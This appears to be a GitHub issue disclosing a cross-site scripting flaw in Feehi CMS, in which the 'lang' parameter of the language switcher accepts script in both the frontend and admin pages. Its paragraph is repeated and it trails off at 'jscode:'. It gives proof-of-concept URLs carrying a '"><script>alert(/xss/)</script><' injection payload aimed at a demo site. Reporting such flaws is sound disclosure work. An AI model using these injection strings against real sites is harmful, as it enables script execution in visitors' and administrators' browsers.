This is a Cross Site Scripting vulnerability appear two place(frontend and backend). When the lang is english"><script>alert(/xss/)</script>< or other js code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:
POC example: http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><
or
This is a Cross Site Scripting vulnerability appear two place(frontend and backend). When the lang is english"><script>alert(/xss/)</script>< or other js code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:
POC example:
http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><or
http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>View any post and xss pop-up:
jscode:

The text was updated successfully, but these errors were encountered: